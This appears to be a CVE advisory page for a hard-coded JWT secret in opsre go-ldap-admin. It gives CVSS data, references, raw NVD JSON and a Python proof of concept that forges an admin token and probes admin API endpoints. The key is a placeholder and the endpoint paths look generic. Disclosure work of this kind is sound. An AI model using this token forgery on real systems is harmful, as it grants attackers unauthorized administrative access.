Security Vulnerability Report
CVE-2025-13948 CVSS 5.6 MEDIUM

CVE-2025-13948

Published: 2025-12-03 15:15:51
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was determined in opsre go-ldap-admin up to 20251011. This issue affects some unknown processing of the file docs/docker-compose/docker-compose.yaml of the component JWT Handler. Executing manipulation of the argument secret key can lead to use of a hard-coded cryptographic key. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score: 5.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

opsre go-ldap-admin <= 20251011

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-13948 PoC - opsre go-ldap-admin Hard-coded JWT Secret Key
This PoC demonstrates how to forge JWT tokens using the hard-coded secret key.
"""
import jwt
import datetime
import requests

# Hard-coded secret key from docker-compose.yaml (example key)
JWT_SECRET = "your-hardcoded-secret-key-here"

# Target configuration
TARGET_URL = "http://target:8080"
USERNAME = "admin"


def forge_jwt_token(username: str, secret: str) -> str:
    """
    Generate a forged JWT token with the hard-coded secret.

    Args:
        username: Target username to impersonate
        secret: Hard-coded JWT secret key

    Returns:
        Forged JWT token string
    """
    payload = {
        "sub": username,
        "iat": datetime.datetime.utcnow(),
        "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=24),
        "username": username,
        "role": "admin"
    }
    token = jwt.encode(payload, secret, algorithm="HS256")
    return token


def exploit(target_url: str, forged_token: str):
    """
    Use the forged token to access protected endpoints.

    Args:
        target_url: Base URL of the vulnerable application
        forged_token: JWT token forged with hard-coded key
    """
    headers = {
        "Authorization": f"Bearer {forged_token}"
    }

    # Try to access admin endpoints
    endpoints = [
        "/api/v1/users",
        "/api/v1/admin/config",
        "/api/v1/ldap/sync"
    ]

    for endpoint in endpoints:
        try:
            response = requests.get(f"{target_url}{endpoint}", headers=headers)
            print(f"[+] {endpoint} - Status: {response.status_code}")
            if response.status_code == 200:
                print(f"    [!] Successfully accessed {endpoint}")
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")


def main():
    print("[*] CVE-2025-13948 PoC - opsre go-ldap-admin JWT Secret Disclosure")
    print("[*] Exploiting hard-coded JWT secret key vulnerability\n")

    # Step 1: Obtain the hard-coded secret (e.g., from leaked config)
    print("[1] Obtaining hard-coded JWT secret from configuration...")
    print(f"    Secret: {JWT_SECRET}")

    # Step 2: Forge JWT token for admin user
    print("\n[2] Forging JWT token for admin user...")
    forged_token = forge_jwt_token(USERNAME, JWT_SECRET)
    print(f"    Generated Token: {forged_token[:50]}...")

    # Step 3: Use forged token to access protected resources
    print("\n[3] Using forged token to access protected endpoints...")
    exploit(TARGET_URL, forged_token)

    print("\n[*] Exploitation complete")


if __name__ == "__main__":
    main()
```

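References

https://gist.github.com/H2u8s/a51ac1fe38d62746d1425b70ff49420c
https://vuldb.com/?ctiid.334163
https://vuldb.com/?id.334163
https://vuldb.com/?submit.692213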

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13948", "sourceIdentifier": "[email protected]", "published": "2025-12-03T15:15:51.240", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in opsre go-ldap-admin up to 20251011. This issue affects some unknown processing of the file docs/docker-compose/docker-compose.yaml of the component JWT Handler. Executing manipulation of the argument secret key can lead to use of hard-coded cryptographic key\r . The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-320"}, {"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://gist.github.com/H2u8s/a51ac1fe38d62746d1425b70ff49420c", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334163", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334163", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.692213", "source": "[email protected]"}]}}